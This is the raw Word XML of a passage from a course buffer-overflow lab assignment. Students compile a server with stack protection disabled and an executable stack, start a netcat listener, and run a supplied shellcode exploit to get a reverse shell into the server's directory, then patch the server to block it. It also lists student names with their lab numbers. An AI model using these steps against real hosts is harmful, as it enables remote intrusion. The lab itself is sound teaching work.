        <w:t>p05)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA06D0" w14:textId="1BA44177" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">3. Copy </w:t>
      </w:r>
      <w:r w:rsidRPr="00C958CB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="006A745E">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>server program</w:t>
      </w:r>
      <w:r w:rsidRPr="00C958CB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> from Canvas</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">) into </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:r w:rsidR="006A745E" w:rsidRPr="006A745E">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>home directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">, and change </w:t>
      </w:r>
      <w:r w:rsidRPr="00C958CB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>the server port</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5123</w:t>
      </w:r>
      <w:r w:rsidRPr="00C958CB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C958CB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C958CB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="006B6502">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E" w:rsidRPr="006B6502">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>0xy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> (e.g., if your </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>number is</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t>xy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t>2, then your server port should be 5</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t>002</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B0E7D" w14:textId="2ECC5EDD" w:rsidR="00241BC4" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4902">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. Compile the server using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241BC4">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241BC4">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m32 </w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-g -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00241BC4">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00241BC4">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303CFFE0" w14:textId="0E329ABE" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r w:rsidRPr="00241BC4">
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">Run the server </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve">in the first terminal (in your home directory) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidRPr="00241BC4">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069F6A5" w14:textId="2C280B1C" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902"/>
    <w:p w14:paraId="29659007" w14:textId="71FB89A1" w:rsidR="005C495A" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidR="00E16981">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>184.171.124.101</w:t>
      </w:r>
      <w:r w:rsidR="00E16981" w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C958CB">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(client)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73978028" w14:textId="595F807C" w:rsidR="00975D9E" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve">In your </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve">, copy both </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:t>client.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve"> (from </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>Canvas</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t>) to your</w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A745E">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve">. Change the </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve">port number from </w:t>
      </w:r>
      <w:r w:rsidR="00975D9E" w:rsidRPr="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>5123</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00975D9E" w:rsidRPr="006B6502">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>50xy</w:t>
      </w:r>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:t>client.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00975D9E">
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00975D9E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39EA01" w14:textId="167D927C" w:rsidR="005C495A" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">change the exploit port number inside the shellcode from </w:t>
      </w:r>
      <w:r w:rsidR="006B6502" w:rsidRPr="00E346E6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">9123 </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="006B6502" w:rsidRPr="00E346E6">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>90xy</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502">
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> (note that you need to convert 90xy to hex numbers</w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> using int2char.c</w:t>
      </w:r>
      <w:r w:rsidR="00BA5294">
        <w:t>, and write the hex numbers at proper positions</w:t>
      </w:r>
      <w:r w:rsidR="00644B6B">
        <w:t xml:space="preserve"> in shellcode</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C3558" w14:textId="4AA8A074" w:rsidR="005C495A" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">Compile your programs using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>client.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o client </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o exploi</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE565C" w14:textId="2A0F83AA" w:rsidR="005C495A" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00097315">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t>un/type the following command in your</w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> second</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B70146">
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> (in directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A745E">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A745E">
        <w:t>) using</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="006B6502">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 90xy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255AA3FA" w14:textId="06540A82" w:rsidR="005C495A" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>the third</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B70146">
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> (in your directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A745E">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A745E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">, and run </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">client hello </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81113">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit hello </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369A7CC" w14:textId="014F9F7A" w:rsidR="00FC4902" w:rsidRDefault="00097315" w:rsidP="00FC4902">
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00FC4902">
        <w:t xml:space="preserve">. If your exploit is successful, your </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>second</w:t>
      </w:r>
      <w:r w:rsidR="00FC4902">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00037E85">
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidR="00FC4902">
        <w:t xml:space="preserve"> (running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4902">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4902">
        <w:t xml:space="preserve"> command) shall be able to access </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">the server’s directory </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve">(i.e.,  your home directory) from directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A745E">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">; therefore, you may </w:t>
      </w:r>
      <w:r w:rsidR="001D474F">
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve">commands such as </w:t>
      </w:r>
      <w:r w:rsidR="006A745E" w:rsidRPr="006A745E">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A745E" w:rsidRPr="006A745E">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A745E" w:rsidRPr="006A745E">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006B6502" w:rsidRPr="001D474F">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="001D474F">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6502" w:rsidRPr="001D474F">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D474F">
        <w:t xml:space="preserve">in that </w:t>
      </w:r>
      <w:r w:rsidR="00037E85">
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidR="001D474F">
        <w:t xml:space="preserve"> so as </w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve">to see the </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>information in</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> your home directory </w:t>
      </w:r>
      <w:r w:rsidR="006B0C81">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0C81">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0C81">
        <w:t xml:space="preserve"> as</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0C81">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0C81">
        <w:t xml:space="preserve"> command and exploit are</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B0C81">
        <w:t>executed</w:t>
      </w:r>
      <w:r w:rsidR="006B6502">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6502">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BAD29B1" w14:textId="77777777" w:rsidR="00F860C8" w:rsidRDefault="00F860C8" w:rsidP="00FC4902"/>
    <w:p w14:paraId="02FF0DD5" w14:textId="7BD6C41D" w:rsidR="00F860C8" w:rsidRDefault="00F860C8" w:rsidP="00FC4902">
      <w:r w:rsidRPr="00F57B5B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Submission</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACEE68" w14:textId="39703CF8" w:rsidR="00F860C8" w:rsidRPr="00F860C8" w:rsidRDefault="00F860C8" w:rsidP="00F860C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F860C8">
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F860C8">
        <w:t>client.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F860C8">
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>a document explaining how</w:t>
      </w:r>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve"> your exploit works</w:t>
      </w:r>
      <w:r w:rsidR="004218A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3842F6DB" w14:textId="122B8F6F" w:rsidR="00F860C8" w:rsidRDefault="00F860C8" w:rsidP="00F860C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve">revised </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0C81">
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0C81">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve">server2.c </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and a document </w:t>
      </w:r>
      <w:r w:rsidR="006B0C81">
        <w:t>explaining</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> how</w:t>
      </w:r>
      <w:r w:rsidRPr="00F860C8">
        <w:t xml:space="preserve"> your exploit is blocked</w:t>
      </w:r>
      <w:r w:rsidR="00D17633">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7E5A3" w14:textId="77777777" w:rsidR="00BC0534" w:rsidRDefault="00BC0534" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401F0A34" w14:textId="5A9BDF07" w:rsidR="00F57B5B" w:rsidRDefault="00F57B5B" w:rsidP="00F57B5B">
      <w:r w:rsidRPr="00F57B5B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Number </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F57B5B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F57B5B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> for students</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93BA9D" w14:textId="21652D4E" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505BB4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ahmed Al-Ali</w:t>
      </w:r>
      <w:r w:rsidR="00F57B5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: 01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893BE52" w14:textId="3A13E60B" w:rsidR="00F57B5B" w:rsidRPr="00102DF9" w:rsidRDefault="00A30BDA" w:rsidP="00F57B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594CA5">
        <w:rPr>
